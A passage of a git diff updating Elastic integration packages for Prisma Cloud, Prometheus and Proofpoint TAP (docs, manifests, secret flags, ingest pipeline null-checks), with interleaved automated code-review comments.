b/packages/prisma_cloud/docs/README.md index dc5212a669b..55ff2c3ac7a 100644 --- a/packages/prisma_cloud/docs/README.md +++ b/packages/prisma_cloud/docs/README.md 
@@ -419,6 +419,7 @@ An example event for `alert` looks as following: | prisma_cloud.alert.resource.url | | keyword | | prisma_cloud.alert.risk_detail.policy_scores.cloud_type | | keyword | | prisma_cloud.alert.risk_detail.policy_scores.compliance_metadata.compliance.id | | keyword | +| prisma_cloud.alert.risk_detail.policy_scores.compliance_metadata.compliance_id | | keyword | | prisma_cloud.alert.risk_detail.policy_scores.compliance_metadata.custom_assigned | | boolean | | prisma_cloud.alert.risk_detail.policy_scores.compliance_metadata.policy.id | | keyword | | prisma_cloud.alert.risk_detail.policy_scores.compliance_metadata.requirement.description | | keyword | @@ -608,13 +609,13 @@ An example event for `host` looks as following: ```json { - "@timestamp": "2023-11-03T06:33:54.250Z", + "@timestamp": "2024-04-03T23:20:14.863Z", "agent": { - "ephemeral_id": "64d561d9-fd72-4f78-b68c-87702b5c3493", - "id": "f2974986-16b8-49d0-803d-316e0e9f4e94", + "ephemeral_id": "a2e1faf9-a21e-4a2e-a964-e756be243ce0", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.13.0" }, "cloud": { "account": { @@ -641,9 +642,9 @@ An example event for `host` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f2974986-16b8-49d0-803d-316e0e9f4e94", + "id": "633dac72-aecd-41d9-88df-dd066a3b83ea", "snapshot": false, - "version": "8.10.1" + "version": "8.13.0" }, "event": { "agent_id_status": "verified", 
@@ -652,7 +653,7 @@ An example event for `host` looks as following: ], "dataset": "prisma_cloud.host", "id": "DESKTOP-6PQXXMS", - "ingested": "2023-11-03T06:33:55Z", + "ingested": "2024-04-03T23:20:24Z", "kind": "event", "original": "{\"_id\":\"DESKTOP-6PQXXMS\",\"binaries\":[{\"altered\":true,\"cveCount\":0,\"deps\":[\"string\"],\"fileMode\":0,\"functionLayer\":\"string\",\"md5\":\"string\",\"missingPkg\":true,\"name\":\"string\",\"path\":\"string\",\"pkgRootDir\":\"string\",\"services\":[\"string\"],\"version\":\"string\"}],\"cloudMetadata\":{\"accountID\":\"Non-onboarded cloud accounts\",\"awsExecutionEnv\":\"string\",\"image\":\"string\",\"labels\":[{\"key\":\"string\",\"sourceName\":\"string\",\"sourceType\":[\"namespace\"],\"timestamp\":\"2023-09-08T04:01:49.949Z\",\"value\":\"string\"}],\"name\":\"string\",\"provider\":[\"aws\"],\"region\":\"string\",\"resourceID\":\"string\",\"resourceURL\":\"string\",\"type\":\"string\",\"vmID\":\"string\",\"vmImageID\":\"string\"},\"type\":\"host\",\"hostname\":\"DESKTOP-6PQXXMS\",\"scanTime\":\"2023-08-23T11:48:41.803Z\",\"Secrets\":[],\"osDistro\":\"windows\",\"osDistroVersion\":\"string\",\"osDistroRelease\":\"Windows\",\"distro\":\"Microsoft Windows [Version 
10.0.19045.2006]\",\"packageManager\":true,\"packages\":[{\"pkgs\":[{\"binaryIdx\":[0],\"binaryPkgs\":[\"string\"],\"cveCount\":0,\"defaultGem\":true,\"files\":[{\"md5\":\"string\",\"path\":\"string\",\"sha1\":\"string\",\"sha256\":\"string\"}],\"functionLayer\":\"string\",\"goPkg\":true,\"jarIdentifier\":\"string\",\"layerTime\":0,\"license\":\"string\",\"name\":\"string\",\"osPackage\":true,\"path\":\"string\",\"version\":\"string\"}],\"pkgsType\":\"nodejs\"}],\"isARM64\":false,\"packageCorrelationDone\":true,\"redHatNonRPMImage\":false,\"image\":{\"created\":\"0001-01-01T00:00:00Z\",\"entrypoint\":[\"string\"],\"env\":[\"string\"],\"healthcheck\":true,\"id\":\"string\",\"labels\":{},\"layers\":[\"string\"],\"os\":\"string\",\"repoDigest\":[\"string\"],\"repoTags\":[\"string\"],\"user\":\"string\",\"workingDir\":\"string\"},\"allCompliance\":{\"compliance\":[{\"applicableRules\":[\"string\"],\"binaryPkgs\":[\"string\"],\"block\":true,\"cause\":\"string\",\"cri\":true,\"custom\":true,\"cve\":\"string\",\"cvss\":0,\"description\":\"string\",\"discovered\":\"2023-09-08T04:01:49.949Z\",\"exploit\":[\"exploit-db\"],\"fixDate\":0,\"fixLink\":\"string\",\"functionLayer\":\"string\",\"gracePeriodDays\":0,\"id\":0,\"layerTime\":0,\"link\":\"string\",\"packageName\":\"string\",\"packageVersion\":\"string\",\"published\":0,\"riskFactors\":{},\"severity\":\"string\",\"status\":\"string\",\"templates\":[[\"PCI\"]],\"text\":\"string\",\"title\":\"string\",\"twistlock\":true,\"type\":[\"container\"],\"vecStr\":\"string\",\"vulnTagInfos\":[{\"color\":\"string\",\"comment\":\"string\",\"name\":\"string\"}],\"wildfireMalware\":{\"md5\":\"string\",\"path\":\"string\",\"verdict\":\"string\"}}],\"enabled\":\"true\"},\"clusters\":[\"string\"],\"repoTag\":null,\"tags\":[{\"digest\":\"string\",\"id\":\"string\",\"registry\":\"string\",\"repo\":\"string\",\"tag\":\"string\"}],\"trustResult\":{\"hostsStatuses\":[{\"host\":\"string\",\"status\":\"trusted\"}]},\"repoDigests\":[],\"creationTi
me\":\"0001-01-01T00:00:00Z\",\"pushTime\":\"0001-01-01T00:00:00Z\",\"vulnerabilitiesCount\":0,\"complianceIssuesCount\":4,\"vulnerabilityDistribution\":{\"critical\":0,\"high\":0,\"medium\":0,\"low\":0,\"total\":0},\"complianceDistribution\":{\"critical\":4,\"high\":0,\"medium\":0,\"low\":0,\"total\":4},\"vulnerabilityRiskScore\":0,\"complianceRiskScore\":4000000,\"riskFactors\":{},\"firstScanTime\":\"2023-08-11T06:53:57.456Z\",\"history\":[{\"baseLayer\":true,\"created\":0,\"emptyLayer\":true,\"id\":\"string\",\"instruction\":\"string\",\"sizeBytes\":0,\"tags\":[\"string\"],\"vulnerabilities\":[{\"applicableRules\":[\"string\"],\"binaryPkgs\":[\"string\"],\"block\":true,\"cause\":\"string\",\"cri\":true,\"custom\":true,\"cve\":\"string\",\"cvss\":0,\"description\":\"string\",\"discovered\":\"2023-09-08T04:01:49.950Z\",\"exploit\":[\"exploit-db\"],\"exploits\":[{\"kind\":[\"poc\",\"in-the-wild\"],\"link\":\"string\",\"source\":[\"\",\"exploit-db\"]}],\"fixDate\":0,\"fixLink\":\"string\",\"functionLayer\":\"string\",\"gracePeriodDays\":0,\"id\":0,\"layerTime\":0,\"link\":\"string\",\"packageName\":\"string\",\"packageVersion\":\"string\",\"published\":0,\"riskFactors\":{},\"severity\":\"string\",\"status\":\"string\",\"templates\":[[\"PCI\"]],\"text\":\"string\",\"title\":\"string\",\"twistlock\":true,\"type\":[\"container\"],\"vecStr\":\"string\",\"vulnTagInfos\":[{\"color\":\"string\",\"comment\":\"string\",\"name\":\"string\"}],\"wildfireMalware\":{\"md5\":\"string\",\"path\":\"string\",\"verdict\":\"string\"}}]}],\"hostDevices\":[{\"ip\":\"0.0.0.0\",\"name\":\"string\"}],\"hosts\":{},\"id\":\"string\",\"err\":\"\",\"collections\":[\"All\"],\"instances\":[{\"host\":\"string\",\"image\":\"string\",\"modified\":\"2023-09-08T04:01:49.951Z\",\"registry\":\"string\",\"repo\":\"string\",\"tag\":\"string\"}],\"scanID\":0,\"trustStatus\":\"\",\"externalLabels\":[{\"key\":\"string\",\"sourceName\":\"string\",\"sourceType\":[\"namespace\"],\"timestamp\":\"2023-09-08T04:01:
49.949Z\",\"value\":\"string\"}],\"files\":[{\"md5\":\"string\",\"path\":\"string\",\"sha1\":\"string\",\"sha256\":\"string\"}],\"firewallProtection\":{\"enabled\":false,\"supported\":false,\"outOfBandMode\":\"Observation\",\"ports\":[0],\"tlsPorts\":[0],\"unprotectedProcesses\":[{\"port\":0,\"process\":\"string\",\"tls\":true}]},\"applications\":[{\"installedFromPackage\":true,\"knownVulnerabilities\":0,\"layerTime\":0,\"name\":\"string\",\"path\":\"string\",\"service\":true,\"version\":\"string\"}],\"appEmbedded\":false,\"wildFireUsage\":null,\"agentless\":false,\"malwareAnalyzedTime\":\"0001-01-01T00:00:00Z\"}", "start": "0001-01-01T00:00:00.000Z", @@ -684,11 +685,11 @@ An example event for `host` looks as following: "type": "host" }, "input": { - "type": "udp" + "type": "tcp" }, "log": { "source": { - "address": "192.168.243.5:34718" + "address": "172.18.0.4:60388" } }, "os": { @@ -752,9 +753,7 @@ An example event for `host` looks as following: "severity": "string", "status": "string", "templates": [ - [ - "PCI" - ] + "PCI" ], "text": "string", "title": "string", @@ -965,9 +964,7 @@ An example event for `host` looks as following: "severity": "string", "status": "string", "templates": [ - [ - "PCI" - ] + "PCI" ], "text": "string", "title": "string", 
@@ -1272,6 +1269,7 @@ An example event for `host` looks as following: | prisma_cloud.host.compliance_issues.data.risk_factors | RiskFactors maps the existence of vulnerability risk factors. | flattened | | prisma_cloud.host.compliance_issues.data.severity | Textual representation of the vulnerability's severity. | keyword | | prisma_cloud.host.compliance_issues.data.status | Vendor status for the vulnerability. | keyword | +| prisma_cloud.host.compliance_issues.data.templates | List of templates with which the vulnerability is associated. | keyword | | prisma_cloud.host.compliance_issues.data.text | Description of the violation. | keyword | | prisma_cloud.host.compliance_issues.data.title | Compliance title. | keyword | | prisma_cloud.host.compliance_issues.data.twistlock | Indicates if this is a Twistlock-specific vulnerability (true) or not (false). | boolean | 
@@ -1280,9 +1278,9 @@ An example event for `host` looks as following: | prisma_cloud.host.compliance_issues.data.vuln_tag_infos.color | Color is a hexadecimal representation of color code value. | keyword | | prisma_cloud.host.compliance_issues.data.vuln_tag_infos.comment | Tag comment in a specific vulnerability context. | keyword | | prisma_cloud.host.compliance_issues.data.vuln_tag_infos.name | Name of the tag. | keyword | -| prisma_cloud.host.compliance_issues.data.wildfire_malware.md5 | MD5 is the hash of the malicious binary. | keyword | -| prisma_cloud.host.compliance_issues.data.wildfire_malware.path | Path is the path to malicious binary. | keyword | -| prisma_cloud.host.compliance_issues.data.wildfire_malware.verdict | Verdict is the malicious source like grayware, malware and phishing. | keyword | +| prisma_cloud.host.compliance_issues.data.wild_fire_malware.md5 | MD5 is the hash of the malicious binary. | keyword | +| prisma_cloud.host.compliance_issues.data.wild_fire_malware.path | Path is the path to malicious binary. | keyword | +| prisma_cloud.host.compliance_issues.data.wild_fire_malware.verdict | Verdict is the malicious source like grayware, malware and phishing. | keyword | | prisma_cloud.host.compliance_risk_score | Compliance risk score for the image. | float | | prisma_cloud.host.creation_time | Specifies the time of creation for the latest version of the image. | date | | prisma_cloud.host.devices.ip | Network device IPv4 address. | ip | 
@@ -1369,7 +1367,7 @@ An example event for `host` looks as following: | prisma_cloud.host.image.history.size_bytes | Size of the layer (in bytes). | long | | prisma_cloud.host.image.history.tags | Holds the image tags. | keyword | | prisma_cloud.host.image.history.vulnerabilities.applicable_rules | Rules applied on the package. | keyword | -| prisma_cloud.host.image.history.vulnerabilities.binaryPkgs | Names of the distro binary package names (packages which are built from the source of the package). | keyword | +| prisma_cloud.host.image.history.vulnerabilities.binary_pkgs | Names of the distro binary package names (packages which are built from the source of the package). | keyword | | prisma_cloud.host.image.history.vulnerabilities.block | Indicates if the vulnerability has a block effect (true) or not (false). | boolean | | prisma_cloud.host.image.history.vulnerabilities.cause | Additional information regarding the root cause for the vulnerability. | keyword | | prisma_cloud.host.image.history.vulnerabilities.cri | Indicates if this is a CRI-specific vulnerability (true) or not (false). | boolean | 
@@ -1541,6 +1539,7 @@ An example event for `host` looks as following: | prisma_cloud.host.vulnerabilities.data.discovered | Specifies the time of discovery for the vulnerability. | date | | prisma_cloud.host.vulnerabilities.data.exploit | ExploitType represents the source of an exploit. | keyword | | prisma_cloud.host.vulnerabilities.data.exploits.kind | ExploitKind represents the kind of the exploit. | keyword | +| prisma_cloud.host.vulnerabilities.data.exploits.link | Link is a link to information about the exploit. | keyword | | prisma_cloud.host.vulnerabilities.data.exploits.source | ExploitType represents the source of an exploit. | keyword | | prisma_cloud.host.vulnerabilities.data.fix_date | Date/time when the vulnerability was fixed (in Unix time). | date | | prisma_cloud.host.vulnerabilities.data.fix_link | Link to the vendor's fixed-version information. | keyword | diff --git a/packages/prisma_cloud/manifest.yml b/packages/prisma_cloud/manifest.yml index 44773c14c48..24862149bf3 100644 --- a/packages/prisma_cloud/manifest.yml +++ b/packages/prisma_cloud/manifest.yml @@ -1,14 +1,17 @@ -format_version: 2.8.0 +format_version: 3.0.3 name: prisma_cloud title: "Palo Alto Prisma Cloud" -version: "1.0.1" +version: "1.2.0" description: "Collect logs from Prisma Cloud with Elastic Agent." type: integration categories: - security + - cloudsecurity_cdr conditions: - kibana.version: "^8.10.1" - elastic.subscription: "basic" + kibana: + version: "^8.12.0" + elastic: + subscription: "basic" screenshots: - src: /img/prisma_cloud-alert-dashboard.png title: Prisma Cloud Alert Dashboard Screenshot @@ -58,6 +61,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: proxy_url type: text title: Proxy URL @@ -132,3 +136,4 @@ policy_templates: description: Collecting logs from Prisma Cloud instance via UDP input. owner: github: elastic/security-service-integrations + type: elastic 
diff --git a/packages/prisma_cloud/validation.yml b/packages/prisma_cloud/validation.yml new file mode 100644 index 00000000000..ddfb73e9384 --- /dev/null +++ b/packages/prisma_cloud/validation.yml @@ -0,0 +1,4 @@ +errors: + exclude_checks: + - SVR00002 # Mandatory filters in dashboards. + - SVR00004 # References in dashboards. diff --git a/packages/prometheus/_dev/build/docs/README.md b/packages/prometheus/_dev/build/docs/README.md index 1c579091524..75c1588f548 100644 --- a/packages/prometheus/_dev/build/docs/README.md +++ b/packages/prometheus/_dev/build/docs/README.md @@ -1,9 +1,9 @@ # Prometheus Integration This integration can collect metrics from: -- [Prometheus Exporters (Collectors)](#prometheus-exporters-collectors) -- [Prometheus Server Remote-Write](#prometheus-server-remote-write) -- [Prometheus Queries (PromQL)](#prometheus-queries-promql) + - [Prometheus Exporters (Collectors)](#prometheus-exporters-collectors) + - [Prometheus Server Remote-Write](#prometheus-server-remote-write) + - [Prometheus Queries (PromQL)](#prometheus-queries-promql) ## Metrics @@ -241,6 +241,10 @@ types, including {{ url "elasticsearch-histograms" "histograms" }}. the counter increment since the last collection. This metric should make some aggregations easier and with better performance. This parameter can only be enabled in combination with `use_types`. +`period` parameter (default: 60s) configures the timeout of internal cache, which stores counter values in order to calculate rates between consecutive fetches. The parameter will be validated and all values lower than 60sec will be reset to the default value. + +Note that by default prometheus pushes data with the interval of 60s (in remote write). In case that prometheus push rate is changed, the `period` parameter needs to be configured accordingly. + When `use_types` and `rate_counters` are enabled, metrics are stored like this: ```json 
diff --git a/packages/prometheus/changelog.yml b/packages/prometheus/changelog.yml index 1b83ac71ae9..b674dae62bb 100644 --- a/packages/prometheus/changelog.yml +++ b/packages/prometheus/changelog.yml @@ -1,4 +1,29 @@ # newer versions go on top +- version: "1.15.1" + changes: + - description: Add a "period" parameter to the counter cache. + type: bugfix + link: https://github.com/elastic/integrations/pull/9424 +- version: "1.15.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.14.2" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.14.1" + changes: + - description: Add Certificate Authorities for Remote Write + type: enhancement + link: https://github.com/elastic/integrations/pull/9264 +- version: "1.14.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.13.1" changes: - description: Migrate Prometheus Server Overview dashboard to lens. diff --git a/packages/prometheus/data_stream/collector/manifest.yml b/packages/prometheus/data_stream/collector/manifest.yml index 4a1b96efb49..00521e90033 100644 --- a/packages/prometheus/data_stream/collector/manifest.yml +++ b/packages/prometheus/data_stream/collector/manifest.yml @@ -61,6 +61,7 @@ streams: title: 'HTTP config options: bearer_token_file' description: If defined, the contents of the file will be read once at initialization and then the value will be used in an HTTP Authorization header. multi: false + secret: false required: false show_user: false - name: ssl.certificate_authorities 
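Review bot: The explicit `secret: false` added to `bearer_token_file` in the `@@ -61,6 +61,7 @@` hunk of the collector manifest is only right because the value is a path to the token rather than the token itself, and that reasoning is not recorded in the hunk. A later reader auditing for `secret: false` next to anything named `bearer_token` will be tempted to flip it, which buys no protection for a non-sensitive path and hides it from the policy editor. Suggest `secret: false # value is a file path; the token is read from that file at initialization` so the intent survives the next review.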
@@ -93,12 +94,12 @@ streams: default: user - name: password type: password + secret: true title: 'HTTP config options: Password' description: The password to use for basic authentication. multi: false required: false show_user: false - default: secret - name: connect_timeout type: text title: 'HTTP config options: connect_timeout' diff --git a/packages/prometheus/data_stream/remote_write/agent/stream/stream.yml.hbs b/packages/prometheus/data_stream/remote_write/agent/stream/stream.yml.hbs index 91f45cf8384..9c85cfa1340 100644 --- a/packages/prometheus/data_stream/remote_write/agent/stream/stream.yml.hbs +++ b/packages/prometheus/data_stream/remote_write/agent/stream/stream.yml.hbs @@ -4,6 +4,13 @@ port: {{port}} ssl.enabled: {{ssl.enabled}} ssl.certificate: {{ssl.certificate}} ssl.key: {{ssl.key}} +{{#if ssl.certificate_authorities}} +ssl.certificate_authorities: +{{#each ssl.certificate_authorities}} + - {{this}} +{{/each}} +{{/if}} +period: {{period}} rate_counters: {{rate_counters}} use_types: {{use_types}} types_patterns.exclude: @@ -19,4 +26,4 @@ data_stream: {{#if processors}} processors: {{processors}} -{{/if}} \ No newline at end of file +{{/if}} diff --git a/packages/prometheus/data_stream/remote_write/manifest.yml b/packages/prometheus/data_stream/remote_write/manifest.yml index b8e640620ed..066b8e74950 100644 --- a/packages/prometheus/data_stream/remote_write/manifest.yml +++ b/packages/prometheus/data_stream/remote_write/manifest.yml @@ -40,6 +40,20 @@ streams: required: false show_user: false default: /etc/pki/server/cert.key + - name: ssl.certificate_authorities + type: text + title: SSL Certificate Authorities + multi: true + required: false + show_user: false + - name: period + type: text + title: Period + description: This is the timeout period for the counter cache, which is used to calculate counter rates. + multi: false + required: true + show_user: false + default: 1m - name: rate_counters type: bool title: Rate Counters 
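Review bot: The new `ssl.certificate_authorities` variable in the remote_write manifest hunk (`@@ -40,6 +40,20 @@`) has no `description`, unlike the sibling `period` variable added in the same hunk, so the policy editor presents a bare "SSL Certificate Authorities" field with no hint whether it takes file paths or PEM content. The stream template hunk on this line (`@@ -4,6 +4,13 @@` of stream.yml.hbs) renders each entry as `  - {{this}}` on one line, which suggests paths; inline multi-line PEM would presumably need a block scalar there, so the description should state the accepted form. Something like `description: Paths to CA certificates used to verify TLS client connections to the remote_write listener.` — adjusted to whichever form the template is actually meant to support and, if the CAs are for client-certificate verification, saying so.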
diff --git a/packages/prometheus/docs/README.md b/packages/prometheus/docs/README.md index a26b9bdffc4..c0483e0c695 100644 --- a/packages/prometheus/docs/README.md +++ b/packages/prometheus/docs/README.md @@ -1,9 +1,9 @@ # Prometheus Integration This integration can collect metrics from: -- [Prometheus Exporters (Collectors)](#prometheus-exporters-collectors) -- [Prometheus Server Remote-Write](#prometheus-server-remote-write) -- [Prometheus Queries (PromQL)](#prometheus-queries-promql) + - [Prometheus Exporters (Collectors)](#prometheus-exporters-collectors) + - [Prometheus Server Remote-Write](#prometheus-server-remote-write) + - [Prometheus Queries (PromQL)](#prometheus-queries-promql) ## Metrics @@ -453,6 +453,10 @@ types, including [histograms](https://www.elastic.co/guide/en/elasticsearch/refe the counter increment since the last collection. This metric should make some aggregations easier and with better performance. This parameter can only be enabled in combination with `use_types`. +`period` parameter (default: 60s) configures the timeout of internal cache, which stores counter values in order to calculate rates between consecutive fetches. The parameter will be validated and all values lower than 60sec will be reset to the default value. + +Note that by default prometheus pushes data with the interval of 60s (in remote write). In case that prometheus push rate is changed, the `period` parameter needs to be configured accordingly. + When `use_types` and `rate_counters` are enabled, metrics are stored like this: ```json diff --git a/packages/prometheus/manifest.yml b/packages/prometheus/manifest.yml index d541d18e1c3..aa00925a2b2 100644 --- a/packages/prometheus/manifest.yml +++ b/packages/prometheus/manifest.yml @@ -1,7 +1,7 @@ format_version: 2.10.0 name: prometheus title: Prometheus -version: 1.13.1 +version: 1.15.1 description: Collect metrics from Prometheus servers with Elastic Agent. type: integration categories: 
@@ -9,7 +9,7 @@ categories: - monitoring - containers conditions: - kibana.version: "^8.9.0" + kibana.version: "^8.12.1" screenshots: - src: /img/prometheus-server-overview.png title: Metricbeat Prometheus Overview diff --git a/packages/prometheus_input/changelog.yml b/packages/prometheus_input/changelog.yml index 2edc4297b08..712a7c71cda 100644 --- a/packages/prometheus_input/changelog.yml +++ b/packages/prometheus_input/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: 0.4.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 0.3.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 0.3.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: 0.2.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/prometheus_input/manifest.yml b/packages/prometheus_input/manifest.yml index 910d4a080a3..240f0b6ff94 100644 --- a/packages/prometheus_input/manifest.yml +++ b/packages/prometheus_input/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: prometheus_input title: "Prometheus Input" -version: "0.2.0" +version: "0.4.0" description: "Collects metrics from Prometheus exporter." type: input categories: @@ -10,7 +10,7 @@ categories: - custom conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: "basic" icons: @@ -84,6 +84,7 @@ policy_templates: - name: password type: password title: Password + secret: true multi: false required: false show_user: true 
diff --git a/packages/proofpoint_tap/changelog.yml b/packages/proofpoint_tap/changelog.yml index b37289ddc7d..94453665d7e 100644 --- a/packages/proofpoint_tap/changelog.yml +++ b/packages/proofpoint_tap/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.18.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9518 +- version: "1.17.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 +- version: "1.16.3" + changes: + - description: Clean up null handling + type: bugfix + link: https://github.com/elastic/integrations/pull/9153 - version: "1.16.2" changes: - description: Add error.message ECS field mapping. diff --git a/packages/proofpoint_tap/data_stream/clicks_blocked/elasticsearch/ingest_pipeline/default.yml b/packages/proofpoint_tap/data_stream/clicks_blocked/elasticsearch/ingest_pipeline/default.yml index 60246eba217..31db4da5fe1 100644 --- a/packages/proofpoint_tap/data_stream/clicks_blocked/elasticsearch/ingest_pipeline/default.yml +++ b/packages/proofpoint_tap/data_stream/clicks_blocked/elasticsearch/ingest_pipeline/default.yml @@ -182,7 +182,7 @@ processors: ignore_failure: true - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - remove: diff --git a/packages/proofpoint_tap/data_stream/clicks_permitted/elasticsearch/ingest_pipeline/default.yml b/packages/proofpoint_tap/data_stream/clicks_permitted/elasticsearch/ingest_pipeline/default.yml index 672d3848268..56f4a473b2a 100644 --- a/packages/proofpoint_tap/data_stream/clicks_permitted/elasticsearch/ingest_pipeline/default.yml +++ b/packages/proofpoint_tap/data_stream/clicks_permitted/elasticsearch/ingest_pipeline/default.yml 
@@ -182,7 +182,7 @@ processors: ignore_failure: true - remove: field: event.original - if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - remove: diff --git a/packages/proofpoint_tap/data_stream/message_blocked/elasticsearch/ingest_pipeline/default.yml b/packages/proofpoint_tap/data_stream/message_blocked/elasticsearch/ingest_pipeline/default.yml index fb3ecb55ef7..5d9df85f691 100644 --- a/packages/proofpoint_tap/data_stream/message_blocked/elasticsearch/ingest_pipeline/default.yml +++ b/packages/proofpoint_tap/data_stream/message_blocked/elasticsearch/ingest_pipeline/default.yml @@ -99,7 +99,7 @@ processors: allow_duplicates: false ignore_failure: true ignore_failure: true - if: ctx.json?.messageParts != null && ctx.json.messageParts instanceof List + if: ctx.json?.messageParts instanceof List - foreach: field: json.messageParts processor: @@ -109,7 +109,7 @@ processors: allow_duplicates: false ignore_failure: true ignore_failure: true - if: ctx.json?.messageParts != null && ctx.json.messageParts instanceof List + if: ctx.json?.messageParts instanceof List - rename: field: json.ccAddresses target_field: email.cc.address @@ -168,7 +168,7 @@ processors: allow_duplicates: false ignore_failure: true ignore_failure: true - if: ctx.json?.recipient != null && ctx.json.recipient instanceof List + if: ctx.json?.recipient instanceof List - rename: field: json.xmailer target_field: email.x_mailer @@ -191,7 +191,7 @@ processors: - _ingest._value.sandboxStatus ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: 
@@ -200,7 +200,7 @@ processors: target_field: _ingest._value.file.mime_type ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -209,7 +209,7 @@ processors: target_field: _ingest._value.file.hash.md5 ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -218,7 +218,7 @@ processors: target_field: _ingest._value.file.hash.sha256 ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - foreach: field: email.attachments processor: @@ -227,14 +227,14 @@ processors: target_field: _ingest._value.file.name ignore_missing: true ignore_failure: true - if: ctx.email?.attachments != null && ctx.email.attachments instanceof List + if: ctx.email?.attachments instanceof List - script: description: Adding hash in related.hash from artifact field. lang: painless ignore_failure: true source: | if (ctx.json?.threatsInfoMap instanceof List) { - for (artifact in ctx.json?.threatsInfoMap) { + for (artifact in ctx.json.threatsInfoMap) { def flag = true; def str = artifact.threat.toLowerCase(); if (str?.length() == 64) { @@ -331,7 +331,7 @@ processors: - _ingest._value.sha256 ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.message_parts != null && ctx.proofpoint_tap.message_blocked.message_parts instanceof List + if: ctx.proofpoint_tap?.message_blocked?.message_parts instanceof List - foreach: field: proofpoint_tap.message_blocked.message_parts processor: 
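Review bot: In the `related.hash` script, the line right after the changed `for` header still calls `artifact.threat.toLowerCase()` with no null-safe operator, so any item whose `threat` key is absent or null throws an NPE; because the script processor carries `ignore_failure: true`, that exception silently aborts the whole loop and the event loses every related hash instead of just skipping the bad item. The `str?.length()` guard on the following line is dead protection, since `str` can never be null by the time it runs. Move the null-safety one step left: `def str = artifact.threat?.toLowerCase();` — then `str?.length() == 64` evaluates to false for a missing value and iteration continues. The script body runs past the end of the hunk, so the remaining branches are not checked here.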
@@ -340,7 +340,7 @@ processors: target_field: _ingest._value.o_content_type ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.message_parts != null && ctx.proofpoint_tap.message_blocked.message_parts instanceof List + if: ctx.proofpoint_tap?.message_blocked?.message_parts instanceof List - foreach: field: proofpoint_tap.message_blocked.message_parts processor: @@ -349,7 +349,7 @@ processors: target_field: _ingest._value.sandbox_status ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.message_parts != null && ctx.proofpoint_tap.message_blocked.message_parts instanceof List + if: ctx.proofpoint_tap?.message_blocked?.message_parts instanceof List - convert: field: json.messageSize target_field: proofpoint_tap.message_blocked.message_size @@ -415,7 +415,7 @@ processors: target_field: _ingest._value.campaign_id ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: @@ -424,7 +424,7 @@ processors: target_field: _ingest._value.threat.artifact ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: 
@@ -433,7 +433,16 @@ processors: target_field: _ingest._value.threat.id ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List + - foreach: + field: proofpoint_tap.message_blocked.threat_info_map + processor: + rename: + field: _ingest._value.threatId + target_field: _ingest._value.threat.id + ignore_missing: true + ignore_failure: true + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: @@ -442,7 +451,7 @@ processors: target_field: _ingest._value.threat.status ignore_missing: true ignore_failure: true - if: ctx.proofpoint_tap?.message_blocked?.threat_info_map != null && ctx.proofpoint_tap.message_blocked.threat_info_map instanceof List + if: ctx.proofpoint_tap?.message_blocked?.threat_info_map instanceof List - foreach: field: proofpoint_tap.message_blocked.threat_info_map processor: @@ -453,7 +462,7 @@ processors: formats: - ISO8601 ignore_failure: true - if: 